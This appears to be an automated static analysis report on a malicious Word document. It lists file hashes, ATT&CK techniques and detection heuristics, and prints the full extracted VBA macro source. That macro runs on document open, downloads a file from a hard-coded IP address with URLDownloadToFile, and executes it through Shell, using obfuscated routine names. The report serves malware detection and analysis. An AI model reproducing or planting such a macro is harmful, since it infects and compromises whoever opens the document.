Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0da22c99de217f2c…

MALICIOUS

Office (OOXML)

173.0 KB Created: 2019-04-18 08:25:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-11-20
MD5: ee449bcdea0224688b269b19ff992803 SHA-1: dd86a78fd2dfe103d2d4bb1802e88fa362f4bdce SHA-256: 0da22c99de217f2cf99363bcf2cc53aedb53919bc349bf019bd77d20cba47ec1
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that execute upon opening the document, as indicated by the Document_Open macro firing. These macros utilize the URLDownloadToFileA function to download a file from the URL http://108.174.199.10/wordupd3.tmp. Subsequently, the Shell() function is called, suggesting the downloaded file is executed, likely leading to further malicious activity.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        If IsNull(123) = False Then
        Shell vbf
    End If
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
    Jkweuf
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://108.174.199.10/wordupd3.tmp Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://www.iec.chReferenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2151 bytes
SHA-256: 074b375a6809604d1815b723de1d54bf03002c76150152576f420c5c10d61f18
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Jkweuf
End Sub

Attribute VB_Name = "Mod1"

#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Sub Jkweuf()
    If IsArray(Array(1, 2, 3)) = True Then
        Hiejnr
    End If
End Sub

Sub Vberw(vbf)
    If IsNull(123) = False Then
        Shell vbf
    End If
End Sub

Attribute VB_Name = "GgopFrm"
Attribute VB_Base = "0{A16B031A-1B86-4013-84A4-B327722C7503}{D7903844-21A4-46E8-9E3A-798A49B0E2AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NMV2_Change()

End Sub

Private Sub UserForm_Initialize()
    Mnuejwr NMV1.Text, Array(1, 2, 3, 4), NMV2.Text
End Sub

Function Mnuejwr(uenjk66, bdjwj77, irweh88)
    If IsArray(bdjwj77) = True Then
        Ioweimwe uenjk66, irweh88
    End If

    Jnej = Len("ytrfg")
    If Jnej = 5 Then
        Vberw uenjk66
    End If
End Function




Attribute VB_Name = "Mod2"
Function Hiejnr()
    GgopFrm.Show
End Function

Attribute VB_Name = "Mod3"
Sub Ioweimwe(mejnw33, mien55)
    If Len(mejnw33) <> Len(mien55) Then
        URLDownloadToFile 0, mien55, mejnw33, 0, 0
    End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 20992 bytes
SHA-256: f886509d9808482a320d3424f4ffcd7c4b3838c4170d0dfca922fdd18556a9e6

Open this report in the interactive analyzer, or submit your own file for analysis.